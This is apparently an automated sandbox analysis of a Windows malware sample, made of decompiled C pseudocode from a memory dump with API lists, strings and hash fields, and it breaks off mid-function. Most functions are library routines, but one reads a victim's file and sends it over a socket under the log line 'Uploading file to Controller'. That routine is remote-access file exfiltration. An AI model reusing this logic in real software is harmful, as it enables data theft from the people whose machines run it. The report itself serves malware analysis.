                              																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
                              																																					__eflags = _t165 - 0x3d;
                              																																					if(_t165 == 0x3d) {
                              																																						L129:
                              																																						_t310 = _t307 - _t292 >> 2;
                              																																					} else {
                              																																						__eflags = _t165;
                              																																						if(_t165 == 0) {
                              																																							goto L129;
                              																																						} else {
                              																																							goto L126;
                              																																						}
                              																																					}
                              																																				}
                              																																				goto L128;
                              																																				L126:
                              																																				_t307 =  &(_t307[1]);
                              																																				__eflags =  *_t307;
                              																																			} while ( *_t307 != 0);
                              																																			goto L127;
                              																																		}
                              																																		L128:
                              																																		return _t310;
                              																																	} else {
                              																																		goto L115;
                              																																	}
                              																																}
                              																																goto L130;
                              																																L115:
                              																																_t291 = _t291 + 4;
                              																																__eflags =  *_t291 - _t173;
                              																															} while ( *_t291 != _t173);
                              																															_t223 = 0;
                              																															__eflags = 0;
                              																															goto L117;
                              																														}
                              																													}
                              																												} else {
                              																													_t167 = 0;
                              																													L118:
                              																													return _t167;
                              																												}
                              																											} else {
                              																												goto L98;
                              																											}
                              																										}
                              																										goto L130;
                              																										L98:
                              																										_t290 = _t290 + 4;
                              																										__eflags =  *_t290 - _t180;
                              																									} while ( *_t290 != _t180);
                              																									goto L100;
                              																								}
                              																							}
                              																						} else {
                              																							_t175 = 0;
                              																							L101:
                              																							return _t175;
                              																						}
                              																					} else {
                              																						_t274 =  &(_t304[_v20 + 1]);
                              																						 *(_t274 - 2) = _t148;
                              																						asm("sbb eax, eax");
                              																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
                              																						__eflags = _t185;
                              																						if(_t185 == 0) {
                              																							_t186 = L00439E14();
                              																							_t221 = _t221 | 0xffffffff;
                              																							__eflags = _t221;
                              																							 *_t186 = 0x2a;
                              																						}
                              																						goto L85;
                              																					}
                              																				}
                              																			}
                              																		}
                              																	}
                              																} else {
                              																	_t191 =  *0x46b4d0; // 0x3179e90
                              																	__eflags = _a4 - _t221;
                              																	if(_a4 == _t221) {
                              																		L58:
                              																		__eflags = _t246;
                              																		if(_t246 != 0) {
                              																			goto L56;
                              																		} else {
                              																			__eflags = _t191;
                              																			if(_t191 != 0) {
                              																				L62:
                              																				 *0x46b4d4 = L0043DFD9(_t246, 1, 4);
                              																				L0043EE85(_t221);
                              																				_t322 = _t322 + 0xc;
                              																				goto L63;
                              																			} else {
                              																				 *0x46b4d0 = L0043DFD9(_t246, 1, 4);
                              																				L0043EE85(_t221);
                              																				_t322 = _t322 + 0xc;
                              																				__eflags =  *0x46b4d0 - _t221; // 0x3179e90
                              																				if(__eflags == 0) {
                              																					goto L55;
                              																				} else {
                              																					_t302 =  *0x46b4d4; // 0x0
                              																					__eflags = _t302;
                              																					if(_t302 != 0) {
                              																						goto L64;
                              																					} else {
                              																						goto L62;
                              																					}
                              																				}
                              																			}
                              																		}
                              																	} else {
                              																		__eflags = _t191;
                              																		if(_t191 == 0) {
                              																			goto L58;
                              																		} else {
                              																			_t196 = L0043C07A(_t221);
                              																			__eflags = _t196;
                              																			if(_t196 != 0) {
                              																				L63:
                              																				_t302 =  *0x46b4d4; // 0x0
                              																				__eflags = _t302;
                              																				if(_t302 == 0) {
                              																					L55:
                              																					_t221 = _t220 | 0xffffffff;
                              																					__eflags = _t221;
                              																					L56:
                              																					L0043EE85(_t288);
                              																					_t136 = _t221;
                              																					goto L57;
                              																				} else {
                              																					goto L64;
                              																				}
                              																			} else {
                              																				goto L54;
                              																			}
                              																		}
                              																	}
                              																}
                              															}
                              														}
                              													} else {
                              														_t197 = L00439E14();
                              														 *_t197 = 0x16;
                              														_t136 = _t197 | 0xffffffff;
                              														L57:
                              														return _t136;
                              													}
                              												} else {
                              													_t280 = _v16 + 1 + _t300 - _a4;
                              													asm("sbb eax, eax");
                              													 *(_t280 - 1) = _t218;
                              													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
                              													__eflags = _t204;
                              													if(_t204 == 0) {
                              														_t205 = L00439E14();
                              														_t218 = _t218 | 0xffffffff;
                              														__eflags = _t218;
                              														 *_t205 = 0x2a;
                              													}
                              													goto L42;
                              												}
                              											}
                              										}
                              									}
                              								}
                              							} else {
                              								__eflags = _a8;
                              								if(_a8 == 0) {
                              									L14:
                              									__eflags = _t120;
                              									if(_t120 == 0) {
                              										 *0x46b4d0 = L0043DFD9(_t231, 1, 4);
                              										L0043EE85(_t218);
                              										_t298 =  *0x46b4d0; // 0x3179e90
                              										_t320 = _t320 + 0xc;
                              										__eflags = _t298;
                              										if(_t298 == 0) {
                              											goto L11;
                              										} else {
                              											__eflags =  *0x46b4d4 - _t218; // 0x0
                              											if(__eflags != 0) {
                              												goto L20;
                              											} else {
                              												 *0x46b4d4 = L0043DFD9(_t231, 1, 4);
                              												L0043EE85(_t218);
                              												_t320 = _t320 + 0xc;
                              												__eflags =  *0x46b4d4 - _t218; // 0x0
                              												if(__eflags == 0) {
                              													goto L11;
                              												} else {
                              													goto L19;
                              												}
                              											}
                              										}
                              									} else {
                              										_t218 = 0;
                              										goto L12;
                              									}
                              								} else {
                              									__eflags =  *0x46b4d4 - _t218; // 0x0
                              									if(__eflags == 0) {
                              										goto L14;
                              									} else {
                              										_t214 = L0043C075(0);
                              										__eflags = _t214;
                              										if(_t214 != 0) {
                              											L19:
                              											_t298 =  *0x46b4d0; // 0x3179e90
                              											L20:
                              											__eflags = _t298;
                              											if(_t298 == 0) {
                              												L11:
                              												_t218 = _t217 | 0xffffffff;
                              												__eflags = _t218;
                              												L12:
                              												L0043EE85(_t286);
                              												_t119 = _t218;
                              												goto L13;
                              											} else {
                              												goto L21;
                              											}
                              										} else {
                              											goto L10;
                              										}
                              									}
                              								}
                              							}
                              						}
                              					}
                              				} else {
                              					_t215 = L00439E14();
                              					 *_t215 = 0x16;
                              					_t119 = _t215 | 0xffffffff;
                              					L13:
                              					return _t119;
                              				}
                              				L130:
                              			}
                              0x00446831
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044675a
                              0x00000000
                              0x0044675c
                              0x0044675c
                              0x0044675f
                              0x0044675f
                              0x00000000
                              0x00446763
                              0x00446712
                              0x004466e3
                              0x004466e3
                              0x0044676f
                              0x00446773
                              0x00446773
                              0x0044668d
                              0x00446691
                              0x00446694
                              0x0044669e
                              0x004466a6
                              0x004466ac
                              0x004466ae
                              0x004466b0
                              0x004466b5
                              0x004466b5
                              0x004466b8
                              0x004466b8
                              0x00000000
                              0x004466ae
                              0x0044668b
                              0x00446677
                              0x00446649
                              0x004465aa
                              0x00446505
                              0x00446505
                              0x0044650a
                              0x0044650d
                              0x0044653a
                              0x0044653a
                              0x0044653c
                              0x00000000
                              0x0044653e
                              0x0044653e
                              0x00446540
                              0x0044656b
                              0x00446575
                              0x0044657a
                              0x0044657f
                              0x00000000
                              0x00446542
                              0x0044654c
                              0x00446551
                              0x00446556
                              0x00446559
                              0x0044655f
                              0x00000000
                              0x00446561
                              0x00446561
                              0x00446567
                              0x00446569
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00446569
                              0x0044655f
                              0x00446540
                              0x0044650f
                              0x0044650f
                              0x00446511
                              0x00000000
                              0x00446513
                              0x00446513
                              0x00446518
                              0x0044651a
                              0x00446582
                              0x00446582
                              0x00446588
                              0x0044658a
                              0x00446527
                              0x00446527
                              0x00446527
                              0x0044652a
                              0x0044652b
                              0x00446532
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044651a
                              0x00446511
                              0x0044650d
                              0x004464ff
                              0x004464cf
                              0x004464a8
                              0x004464a8
                              0x004464ad
                              0x004464b3
                              0x00446535
                              0x00446539
                              0x00446539
                              0x0044644d
                              0x00446456
                              0x0044645e
                              0x00446462
                              0x00446469
                              0x0044646f
                              0x00446471
                              0x00446473
                              0x00446478
                              0x00446478
                              0x0044647b
                              0x0044647b
                              0x00000000
                              0x00446471
                              0x0044644b
                              0x00446438
                              0x00446410
                              0x00446371
                              0x004462ca
                              0x004462ca
                              0x004462cd
                              0x004462fe
                              0x004462fe
                              0x00446300
                              0x00446310
                              0x00446315
                              0x0044631a
                              0x00446320
                              0x00446323
                              0x00446325
                              0x00000000
                              0x00446327
                              0x00446327
                              0x0044632d
                              0x00000000
                              0x0044632f
                              0x00446339
                              0x0044633e
                              0x00446343
                              0x00446346
                              0x0044634c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044634c
                              0x0044632d
                              0x00446302
                              0x00446302
                              0x00000000
                              0x00446302
                              0x004462cf
                              0x004462cf
                              0x004462d5
                              0x00000000
                              0x004462d7
                              0x004462d7
                              0x004462dc
                              0x004462de
                              0x0044634e
                              0x0044634e
                              0x00446354
                              0x00446354
                              0x00446356
                              0x004462eb
                              0x004462eb
                              0x004462eb
                              0x004462ee
                              0x004462ef
                              0x004462f6
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004462de
                              0x004462d5
                              0x004462cd
                              0x004462c4
                              0x00446294
                              0x0044626d
                              0x0044626d
                              0x00446272
                              0x00446278
                              0x004462f9
                              0x004462fd
                              0x004462fd
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                              • String ID:
                              • API String ID: 2719235668-0
                              • Opcode ID: e3b7318083cad0de1a16587f14d9e5a514d884cb7a4dc46a17bab935d5e14516
                              • Instruction ID: b3a0fccac4172db87641eb1f9af5537d347888dfd9dcec10cf93ff69a179e89b
                              • Opcode Fuzzy Hash: e3b7318083cad0de1a16587f14d9e5a514d884cb7a4dc46a17bab935d5e14516
                              • Instruction Fuzzy Hash: 17D127719003007BFB20AF75984266B7BA4EF07718F06016FE945D7382EB799901CB9E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E00406455(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
                              				void* _v12;
                              				union _LARGE_INTEGER _v16;
                              				struct _OVERLAPPED* _v20;
                              				long _v24;
                              				long _v28;
                              				intOrPtr _v32;
                              				long _v36;
                              				struct _OVERLAPPED* _v40;
                              				union _LARGE_INTEGER* _v44;
                              				signed int _v48;
                              				signed int _v52;
                              				struct %anon52 _v64;
                              				intOrPtr _v68;
                              				struct %anon52 _v80;
                              				union _LARGE_INTEGER _v84;
                              				intOrPtr _v88;
                              				char _v112;
                              				char _v136;
                              				char _v160;
                              				char _v184;
                              				char _v208;
                              				char _v232;
                              				char _v256;
                              				char _v280;
                              				char _v304;
                              				char _v328;
                              				char _v352;
                              				char _v376;
                              				char _v400;
                              				char _v424;
                              				char _v448;
                              				char _v472;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				struct %anon52 _t117;
                              				void* _t119;
                              				void* _t126;
                              				long _t136;
                              				void* _t137;
                              				signed int _t138;
                              				struct _OVERLAPPED* _t145;
                              				signed int _t148;
                              				void* _t154;
                              				void* _t156;
                              				void* _t157;
                              				void* _t173;
                              				long _t198;
                              				signed int _t203;
                              				void* _t216;
                              				union _LARGE_INTEGER _t280;
                              				intOrPtr _t281;
                              				union _LARGE_INTEGER* _t295;
                              				void* _t297;
                              				void* _t301;
                              				void* _t302;
                              				void* _t303;
                              				void* _t304;
                              				void* _t305;
                              
                              				_t278 = __edx;
                              				_v68 = __ecx;
                              				E00404955(__ecx);
                              				_t302 = _t301 - 0x10;
                              				asm("movsd");
                              				asm("movsd");
                              				asm("movsd");
                              				asm("movsd");
                              				_t299 = _v68;
                              				E004049D2(__edx);
                              				_v28 = 0x186a0;
                              				_v20 = 0;
                              				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                              				_t310 = _t297 - 0xffffffff;
                              				if(_t297 != 0xffffffff) {
                              					_v80.LowPart = 0;
                              					_v80.HighPart = 0;
                              					__imp__GetFileSizeEx(_t297,  &_v80);
                              					_t203 = _v80.HighPart;
                              					_t117 = _v80;
                              					_v48 = _t203;
                              					_v32 = _t203;
                              					_v52 = _t117;
                              					_v16.LowPart = _t117;
                              					E0040425F(0,  &_v112, _a4);
                              					_t119 = L00416C93( &_v136,  &_v112);
                              					_t303 = _t302 - 0x18;
                              					_t280 = "Uploading file to Controller: ";
                              					E004075C4(0, _t303, _t280, _t297, __eflags, _t119);
                              					_t304 = _t303 - 0x14;
                              					E00402064(0, _t304, "[Info]");
                              					E004165D8(0, _t297);
                              					_t305 = _t304 + 0x30;
                              					L00401FA7();
                              					L00401ED0();
                              					_v36 = 1;
                              					_v40 = 0;
                              					_t126 = E004500F0(_v52, _v48, 0x186a0, 0);
                              					_t210 = _t280;
                              					asm("xorps xmm0, xmm0");
                              					_v88 = _t126 + 1;
                              					asm("adc ecx, ebx");
                              					asm("movlpd [ebp-0x3c], xmm0");
                              					_v84.LowPart = _t280;
                              					__eflags = _v48;
                              					if(__eflags < 0) {
                              						L17:
                              						CloseHandle(_t297);
                              						L00404DD5(_t299);
                              						_t198 = 1;
                              					} else {
                              						if(__eflags > 0) {
                              							L5:
                              							_v44 = _v64.HighPart.LowPart;
                              							_v64.HighPart.LowPart = _v64;
                              							_t136 = 0x186a0;
                              							goto L6;
                              							do {
                              								do {
                              									L6:
                              									_t281 = _v32;
                              									__eflags = _v20 - _t281;
                              									if(__eflags >= 0) {
                              										_t210 = _v16.LowPart;
                              										if(__eflags > 0) {
                              											L9:
                              											_t136 = _t210;
                              											_v20 = _t281;
                              											_v28 = _t136;
                              										} else {
                              											__eflags = _t136 - _t210;
                              											if(__eflags > 0) {
                              												goto L9;
                              											}
                              										}
                              									}
                              									_push(_t136);
                              									_t137 = L0042EE1E(_t210, _t281, _t299, __eflags);
                              									_push(0);
                              									_v12 = _t137;
                              									_v24 = 0;
                              									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
                              									__eflags = _t138;
                              									if(_t138 == 0) {
                              										_t306 = _t305 - 0x18;
                              										_t216 = _t305 - 0x18;
                              										_push("SetFilePointerEx error");
                              										goto L23;
                              									} else {
                              										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
                              										__eflags = _t148;
                              										if(_t148 == 0) {
                              											_t306 = _t305 - 0x18;
                              											_t216 = _t305 - 0x18;
                              											_push("ReadFile error");
                              											L23:
                              											E00402064(0, _t216);
                              											E00402064(0, _t306 - 0x18, "[ERROR]");
                              											E004165D8(0, _t297);
                              											L0042EE27(_v12);
                              											CloseHandle(_t297);
                              											goto L24;
                              										} else {
                              											__eflags = _v24;
                              											if(__eflags == 0) {
                              												L0042EE27(_v12);
                              												CloseHandle(_t297);
                              												L00404DD5(_t299);
                              												_t145 = 1;
                              												goto L25;
                              											} else {
                              												E0040425F(0,  &_v112, _a4);
                              												_t154 = E0040208B(0,  &_v472, _t281, __eflags, _v12, _v24);
                              												_t305 = _t305 - 0x18;
                              												_t156 = L00416BB8(0x46c238,  &_v448, _v88, _v84);
                              												_t157 = L00416BB8(0x46c238,  &_v424, _v36, _v40);
                              												L00402EFD(_t305, L00402F73(0x46c238,  &_v136, L00402F73(0x46c238,  &_v160, L00402F73(0x46c238,  &_v184, L00402EFD( &_v208, L00402F73(0x46c238,  &_v232, L00402EFD( &_v256, L00402F73(0x46c238,  &_v280, L00402F73(0x46c238,  &_v304, L00402F73(0x46c238,  &_v328, L00402F73(0x46c238,  &_v352, L00402F73(0x46c238,  &_v376, L00416CF4(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
                              												_t299 = _v68;
                              												_push(0x52);
                              												_t173 = L00404A6E(0x46c238, _v68, _t171, __eflags);
                              												__eflags = _t173 - 0xffffffff;
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401FA7();
                              												L00401ED0();
                              												__eflags = 0x46c200 | _t173 == 0xffffffff;
                              												if((0x46c200 | _t173 == 0xffffffff) != 0) {
                              													L00404DD5(_t299);
                              													CloseHandle(_t297);
                              													L0042EE27(_v12);
                              													_t198 = 0;
                              												} else {
                              													goto L14;
                              												}
                              											}
                              										}
                              									}
                              									goto L18;
                              									L14:
                              									L0042EE27(_v12);
                              									_t136 = _v28;
                              									_v16.LowPart = _v16 - _t136;
                              									_t295 = _v44;
                              									asm("sbb ecx, [ebp-0x10]");
                              									_v36 = _v36 + 1;
                              									_push(0);
                              									_pop(0);
                              									asm("adc [ebp-0x24], ebx");
                              									_t210 = _v64.HighPart.LowPart + _t136;
                              									_v64.HighPart = _t210;
                              									asm("adc edx, [ebp-0x10]");
                              									_v44 = _t295;
                              									__eflags = _t295 - _v48;
                              								} while (__eflags < 0);
                              								if(__eflags > 0) {
                              									goto L17;
                              								} else {
                              									goto L16;
                              								}
                              								goto L18;
                              								L16:
                              								__eflags = _t210 - _v52;
                              							} while (_t210 < _v52);
                              							goto L17;
                              						} else {
                              							__eflags = _v52;
                              							if(_v52 <= 0) {
                              								goto L17;
                              							} else {
                              								goto L5;
                              							}
                              						}
                              					}
                              				} else {
                              					E004020CC(0, _t302 - 0x18, _t278, _t310,  &_a8);
                              					_push(0x53);
                              					L00404A6E(0, 0x46c2e8, _t278, _t310);
                              					L24:
                              					L00404DD5(_t299);
                              					_t145 = 0;
                              					L25:
                              					_t198 = _t145;
                              				}
                              				L18:
                              				L00401FA7();
                              				L00401FA7();
                              				L00401FA7();
                              				return _t198;
                              			}

                              0x00406455
                              0x00406461
                              0x00406464
                              0x00406469
                              0x00406473
                              0x00406474
                              0x00406475
                              0x00406476
                              0x00406477
                              0x0040647c
                              0x00406483
                              0x0040649d
                              0x004064a6
                              0x004064a8
                              0x004064ab
                              0x004064cf
                              0x004064d4
                              0x004064d7
                              0x004064dd
                              0x004064e0
                              0x004064e6
                              0x004064e9
                              0x004064ef
                              0x004064f2
                              0x004064f5
                              0x00406503
                              0x00406508
                              0x0040650b
                              0x00406513
                              0x00406518
                              0x00406522
                              0x00406527
                              0x0040652c
                              0x00406535
                              0x0040653d
                              0x00406548
                              0x00406553
                              0x00406559
                              0x00406561
                              0x00406563
                              0x00406566
                              0x00406569
                              0x0040656b
                              0x00406570
                              0x00406573
                              0x00406576
                              0x00406817
                              0x00406818
                              0x00406820
                              0x00406825
                              0x0040657c
                              0x0040657c
                              0x00406587
                              0x0040658a
                              0x00406590
                              0x00406593
                              0x00406593
                              0x00406598
                              0x00406598
                              0x00406598
                              0x00406598
                              0x0040659b
                              0x0040659e
                              0x004065a0
                              0x004065a3
                              0x004065a9
                              0x004065a9
                              0x004065ab
                              0x004065ae
                              0x004065a5
                              0x004065a5
                              0x004065a7
                              0x00000000
                              0x00000000
                              0x004065a7
                              0x004065a3
                              0x004065b1
                              0x004065b2
                              0x004065b8
                              0x004065bd
                              0x004065c3
                              0x004065c7
                              0x004065cd
                              0x004065cf
                              0x0040688d
                              0x00406890
                              0x00406892
                              0x00000000
                              0x004065d5
                              0x004065e2

                              APIs
                                • Part of subcall function 004049D2: connect.WS2_32(?,0046DB88,00000010), ref: 004049ED
                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064A0
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 004064D7
                              • __aulldiv.LIBCMT ref: 00406559
                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 004065C7
                              • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 004065E2
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                                • Part of subcall function 00404DD5: closesocket.WS2_32(?), ref: 00404DDB
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                              • API String ID: 1319223106-2190262076
                              • Opcode ID: 5a23789908aa5a281926455435f61879a48f65eda8f6a275c427b5af12834781
                              • Instruction ID: 084dee6794f9bc5a8996b457c444aa73e5b6539c698c474e9a2b46c6d08c787a
                              • Opcode Fuzzy Hash: 5a23789908aa5a281926455435f61879a48f65eda8f6a275c427b5af12834781
                              • Instruction Fuzzy Hash: 9AC16871E00219ABCB04FF65DC829EEB775AF44304F5081BFE406B6291EF385A458B99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 64%
                              			E004187B2(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                              				struct tagPOINT _v12;
                              				void* _t16;
                              				struct HMENU__* _t17;
                              				void* _t20;
                              				void* _t24;
                              
                              				_t16 = _a8 - 1;
                              				if(_t16 == 0) {
                              					_t17 = CreatePopupMenu();
                              					 *0x46beb8 = _t17;
                              					AppendMenuA(_t17, 0, 0, "Close");
                              					L15:
                              					return 0;
                              				}
                              				_t20 = _t16 - 0x110;
                              				if(_t20 == 0) {
                              					if(_a12 != 0) {
                              						goto L15;
                              					}
                              					Shell_NotifyIconA(2, 0x46bec0);
                              					ExitProcess(0);
                              				}
                              				if(_t20 == 0x2f0) {
                              					_t24 = _a16 - 0x201;
                              					if(_t24 == 0) {
                              						if(IsWindowVisible( *0x46bebc) == 0) {
                              							ShowWindow( *0x46bebc, 9);
                              							SetForegroundWindow( *0x46bebc);
                              						} else {
                              							ShowWindow( *0x46bebc, 0);
                              						}
                              						goto L15;
                              					}
                              					if(_t24 == 3) {
                              						GetCursorPos( &_v12);
                              						SetForegroundWindow(_a4);
                              						TrackPopupMenu( *0x46beb8, 0, _v12, _v12.y, 0, _a4, 0);
                              						goto L15;
                              					}
                              					_push(_a16);
                              					_push(_a12);
                              					_push(0x401);
                              					L7:
                              					return DefWindowProcA(_a4, ??, ??, ??);
                              				}
                              				_push(_a16);
                              				_push(_a12);
                              				_push(_a8);
                              				goto L7;
                              			}

                              APIs
                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 004187FD
                              • GetCursorPos.USER32(?), ref: 0041880C
                              • SetForegroundWindow.USER32(?), ref: 00418815
                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041882F
                              • Shell_NotifyIconA.SHELL32(00000002,0046BEC0), ref: 00418880
                              • ExitProcess.KERNEL32 ref: 00418888
                              • CreatePopupMenu.USER32 ref: 0041888E
                              • AppendMenuA.USER32 ref: 004188A3
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                              • String ID: Close
                              • API String ID: 1657328048-3535843008
                              • Opcode ID: 34bd8b003ed8040b53161cef1e7b838e0dd6a32a7fd2539b020779d52ba0edc8
                              • Instruction ID: 384e4941bdc51aec785ae54d0846d7427833242b9ed721b5f4b9d7b17cf01d93
                              • Opcode Fuzzy Hash: 34bd8b003ed8040b53161cef1e7b838e0dd6a32a7fd2539b020779d52ba0edc8
                              • Instruction Fuzzy Hash: 28216B31104209BFDB096FA4ED0DAAA7B75FB04342F10413EFA16901B1DBB6DAA0DB59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E0043E23C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                              				signed int _v8;
                              				char _v21;
                              				intOrPtr _v22;
                              				struct _cpinfo _v28;
                              				void* _v32;
                              				void* _v36;
                              				void* _v40;
                              				intOrPtr* _v44;
                              				signed int _v48;
                              				void* _v52;
                              				signed int* _v56;
                              				intOrPtr _v60;
                              				intOrPtr* _v64;
                              				signed int* _v68;
                              				void* _v72;
                              				char _v76;
                              				signed int _t101;
                              				signed int _t123;
                              				signed short _t126;
                              				void* _t130;
                              				void* _t134;
                              				void* _t137;
                              				void* _t138;
                              				intOrPtr _t139;
                              				void* _t141;
                              				signed int _t142;
                              				intOrPtr* _t143;
                              				signed char _t160;
                              				signed char _t165;
                              				signed int _t166;
                              				void* _t168;
                              				signed int _t170;
                              				void* _t179;
                              				signed int* _t180;
                              				signed int* _t181;
                              				signed int _t182;
                              				signed char* _t189;
                              				signed char* _t190;
                              				signed int _t192;
                              				void* _t193;
                              				intOrPtr _t197;
                              				short* _t209;
                              				intOrPtr* _t211;
                              				intOrPtr* _t215;
                              				signed int _t216;
                              				signed int _t217;
                              				void* _t218;
                              				void* _t219;
                              
                              				_t101 =  *0x46a00c; // 0x5d382218
                              				_v8 = _t101 ^ _t217;
                              				_t211 = _a4;
                              				_t170 = 0;
                              				_v64 = _t211;
                              				_v32 = 0;
                              				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
                              				_v36 = 0;
                              				_v40 = 0;
                              				_v52 = 0;
                              				_v76 = _t211;
                              				_v72 = 0;
                              				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
                              					__eflags =  *(_t211 + 0x8c);
                              					if( *(_t211 + 0x8c) != 0) {
                              						asm("lock dec dword [eax]");
                              					}
                              					 *(_t211 + 0x8c) = _t170;
                              					__eflags = 0;
                              					 *(_t211 + 0x90) = _t170;
                              					 *_t211 = 0x4577a8;
                              					 *((intOrPtr*)(_t211 + 0x94)) = 0x457a28;
                              					 *((intOrPtr*)(_t211 + 0x98)) = 0x457ba8;
                              					 *((intOrPtr*)(_t211 + 4)) = 1;
                              					L41:
                              					return E0042F61B(_v8 ^ _t217);
                              				}
                              				_t106 = _t211 + 8;
                              				_v44 = 0;
                              				if( *(_t211 + 8) != 0) {
                              					L3:
                              					_v44 = L0043DFD9(_t172, 1, 4);
                              					L0043EE85(_t170);
                              					_v32 = L0043DFD9(_t172, 0x180, 2);
                              					L0043EE85(_t170);
                              					_v36 = L0043DFD9(_t172, 0x180, 1);
                              					L0043EE85(_t170);
                              					_v40 = L0043DFD9(_t172, 0x180, 1);
                              					L0043EE85(_t170);
                              					_t197 = L0043DFD9(_t172, 0x101, 1);
                              					_v52 = _t197;
                              					L0043EE85(_t170);
                              					_t219 = _t218 + 0x3c;
                              					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
                              						L36:
                              						L0043EE85(_v44);
                              						L0043EE85(_v32);
                              						L0043EE85(_v36);
                              						L0043EE85(_v40);
                              						_t170 = 1;
                              						__eflags = 1;
                              						goto L37;
                              					} else {
                              						_t123 = _t170;
                              						do {
                              							 *(_t123 + _t197) = _t123;
                              							_t123 = _t123 + 1;
                              						} while (_t123 < 0x100);
                              						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
                              							goto L36;
                              						}
                              						_t126 = _v28;
                              						_t235 = _t126 - 5;
                              						if(_t126 > 5) {
                              							goto L36;
                              						}
                              						_t28 = _t197 + 1; // 0x1
                              						_v48 = _t126 & 0x0000ffff;
                              						_t192 = 0xff;
                              						_t130 = E0044348A(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
                              						_t219 = _t219 + 0x24;
                              						_t236 = _t130;
                              						if(_t130 == 0) {
                              							goto L36;
                              						}
                              						_t34 = _t197 + 1; // 0x1
                              						_t134 = E0044348A(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
                              						_t219 = _t219 + 0x24;
                              						if(_t134 == 0) {
                              							goto L36;
                              						}
                              						if(_v48 <= 1 || _v22 == _t170) {
                              							L22:
                              							_v60 = _v32 + 0x100;
                              							_t137 = L00447F5C(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
                              							_t219 = _t219 + 0x1c;
                              							if(_t137 == 0) {
                              								goto L36;
                              							}
                              							_t193 = _v32;
                              							_t138 = _t193 + 0xfe;
                              							 *_t138 = 0;
                              							_t179 = _v36;
                              							_v32 = _t138;
                              							_t139 = _v40;
                              							 *(_t179 + 0x7f) = _t170;
                              							_t180 = _t179 - 0xffffff80;
                              							 *(_t139 + 0x7f) = _t170;
                              							_v68 = _t180;
                              							 *_t180 = _t170;
                              							_t181 = _t139 + 0x80;
                              							_v56 = _t181;
                              							 *_t181 = _t170;
                              							if(_v48 <= 1 || _v22 == _t170) {
                              								L32:
                              								_t182 = 0x3f;
                              								memcpy(_t193, _t193 + 0x200, _t182 << 2);
                              								_push(0x1f);
                              								asm("movsw");
                              								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
                              								_push(0x1f);
                              								asm("movsw");
                              								asm("movsb");
